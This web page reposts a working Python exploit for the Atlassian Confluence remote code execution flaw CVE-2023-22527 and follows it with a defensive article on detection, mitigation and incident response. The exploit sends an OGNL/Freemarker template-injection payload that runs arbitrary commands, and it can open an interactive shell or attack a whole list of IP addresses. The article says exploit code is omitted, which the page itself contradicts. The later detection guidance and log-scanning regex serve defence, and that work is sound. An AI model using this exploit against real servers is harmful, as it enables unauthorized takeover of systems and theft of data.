Atlassian Confluence < 8.5.3 - Remote Code Execution

Exploit Author: MaanVader Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-03-18 
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527



import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()

# Rich console for formatted output
console = Console()

# Function to send payload
def send_payload(url, command):
    headers = {
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
    headers['Content-Length'] = str(len(payload))
    
    full_url = f"{url}/template/aui/text-inline.vm"
    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
    return response.text.split('<!DOCTYPE html>')[0].strip()

# Interactive shell function
def interactive_shell(url):
    session = PromptSession()
    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
    while True:
        try:
            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
            if cmd.lower() in ["exit", "quit"]:
                break
            response = send_payload(url, cmd)
            console.print(response)
        except KeyboardInterrupt:
            break
        except Exception as e:
            console.print(f"[bold red]Error: {e}[/bold red]")
            break

# Process file function
def process_file(file_path):
    with open(file_path, 'r') as file:
        for line in file:
            ip = line.strip()
            url = f"http://{ip}:8090"
            console.print(f"Processing {url}")
            print(send_payload(url, args.command))

# Main execution logic
if args.shell and args.url:
    interactive_shell(args.url)
elif args.url and args.command:
    print(send_payload(args.url, args.command))
elif args.file and args.command:
    process_file(args.file)
else:
    print("Error: Please provide a valid URL and a command or use the interactive shell option.")


Atlassian Confluence < 8.5.3 — Remote Code Execution (CVE-2023-22527)

This article examines the Confluence Server & Data Center remote code execution vulnerability tracked as CVE-2023-22527. It explains the vulnerability at a high level, outlines impacted versions, describes detection and mitigation strategies, and provides practical defensive guidance for administrators and incident responders. Technical attack payloads and step‑by‑step exploit code are intentionally omitted; the focus is on protection, detection, and recovery.

Vulnerability overview

CVE-2023-22527 is a server‑side template/renderer injection issue in certain Confluence versions that allows an unauthenticated or improperly authorized attacker to submit crafted template requests that cause the application to evaluate attacker‑controlled expressions. By abusing the template rendering context (for example, velocity/freemarker/OGNL contexts), an attacker can escalate to arbitrary code execution on the host running Confluence.

Affected products and versions

Atlassian identified a range of Confluence Server and Data Center releases that were impacted by this vulnerability. Administrators should assume versions in the 8.x era listed in vendor advisories are at risk until they are updated. Atlassian released security updates and guidance; operators must consult the vendor advisory for the exact affected version range and the specific fixed release to which they should upgrade.

Affected Action
Confluence Server / Data Center releases in the affected 8.x range (per Atlassian advisory) Apply vendor-released security update or hotfix immediately; if you cannot patch, apply mitigations and compensating controls described below

Impact and risk

  • Remote code execution on Confluence servers allows full system compromise, data exfiltration, lateral movement, and persistence.
  • Successful exploits can be automated and widely scanned for, so exposure to the public Internet dramatically increases risk.
  • Organizations using Confluence to host sensitive documentation, credentials, or integration endpoints are at high risk if not patched promptly.

High‑level attack flow (conceptual)

  • An attacker crafts a request targeting a template rendering endpoint or feature that accepts template/label parameters.
  • Malicious expressions are injected into the template/context; the application evaluates those expressions in a higher‑privilege runtime.
  • The evaluation leads to execution of OS commands or arbitrary Java code, enabling shell access or payload execution on the host.
  • Attacker uses the foothold to enumerate data, create persistence, and move laterally.

Detection and Indicators of Compromise (IoCs)

Detection focuses on anomalous HTTP requests, suspicious template activity, unexpected process execution on the Confluence host, and post‑compromise behaviors. Below are defensive signals you can monitor for:

  • Unusual POST requests to template or rendering endpoints (e.g., endpoints that render velocity/freemarker templates).
  • Request parameters containing templating language markers (OGNL, Velocity or Freemarker syntaxes) or long, encoded payloads.
  • Unexpected spikes in 500/502 server errors following POSTs to template endpoints.
  • New, unexpected processes, reverse shells, or child processes of the Confluence JVM.
  • Network connections from the Confluence host to unknown external IPs shortly after suspicious requests.

Practical detection examples (defensive)

Below are safe, defensive code snippets to help administrators detect suspicious activity. These examples do not contain exploit payloads and are intended for log analysis and auditing.

# Example: simple curl to retrieve HTTP headers from a Confluence server (safe version check)
# Use this to verify server identity and server header; does not exploit anything.
curl -I https://confluence.example.com

Explanation: This command retrieves only HTTP headers (no payload) from the target Confluence host. Administrators can use the response headers to help identify the application and version information disclosed by the server for inventory and patch management.

# Example: Python script to scan access logs for suspicious requests to template/rendering endpoints
# (Defensive log scanning; identifies anomalous requests for review)
import re

pattern = re.compile(r"(template|text-inline|render).*(velocity|freemarker|ognl|\\$\\{|#\\{)", re.IGNORECASE)
with open('/var/log/confluence/access.log') as f:
    for line in f:
        if pattern.search(line):
            print(line.strip())

Explanation: This defensive Python snippet searches Confluence access logs for requests that reference template/rendering paths and contain templating indicators such as Velocity/Freemarker placeholders. Matches are flagged for further investigation by security teams.

Mitigation and remediation

  • Patch immediately: Apply the security update or hotfix provided by Atlassian for CVE‑2023‑22527. If you cannot patch immediately, apply vendor-recommended mitigations.
  • Restrict access: Limit external access to Confluence administrative and template endpoints using network ACLs, VPNs, or IP allowlists.
  • WAF rules: Deploy or enable WAF rules to block requests containing templating language tokens or unusually encoded payloads. Use conservative rules to avoid false positives and test in monitoring mode first.
  • Least privilege: Run Confluence under a service account with minimal OS privileges; ensure the Confluence process cannot write to sensitive locations.
  • Harden integrations: Rotate secrets and API keys used by Confluence, and review OAuth/App links for suspicious changes.
  • Backup & restore: Ensure recent, validated backups exist. If you detect compromise, preserve forensic images prior to rebuild/restore.

Incident response checklist

  • Isolate the affected host(s) from the network to prevent lateral movement.
  • Capture volatile evidence: memory dump, running process list, open network connections, and service configuration snapshots.
  • Collect and preserve logs: web access logs, application logs, OS logs, and SIEM data for the relevant timeframe.
  • Identify persistence: scheduled jobs, new user accounts, modified startup scripts, web shells.
  • Rotate credentials and secrets that may have been used or stored on the compromised server.
  • Rebuild from known good images after eradication, and apply the vendor patch before reconnecting to production networks.

Hardening recommendations (long term)

  • Maintain a robust patch management program: track vendor advisories and apply critical security updates in a timely fashion.
  • Reduce public exposure: only publish Confluence to the Internet when necessary; place it behind reverse proxies and authentication gateways.
  • Implement continuous monitoring: IDS/IPS, EDR on hosts, and application‑level logging forwarded to SIEM for correlation.
  • Use application allowlisting for outgoing connections from critical servers to reduce data exfiltration risk.
  • Regularly perform authorized security testing (internal red team, code review, automated SAST/DAST) and external penetration tests under a controlled scope.

Responsible testing and disclosures

Only perform vulnerability testing and exploit attempts on systems you own or are explicitly authorized to test. Unauthorized scanning or exploitation of public systems is illegal and irresponsible. If you discover vulnerable servers on your network, prioritize patching, containment, and follow the incident response checklist above. If you find vulnerable third‑party systems, notify the owner through responsible disclosure channels rather than attempting exploitation.

References and resources

  • Atlassian product and security advisories — consult the vendor advisory for detailed patch instructions and the definitive list of affected versions.
  • CVE database entry for CVE‑2023‑22527 — for official CVE metadata and references.
  • Security best practices for web applications and Java-based services (WAF, logging, least‑privilege service accounts, patching).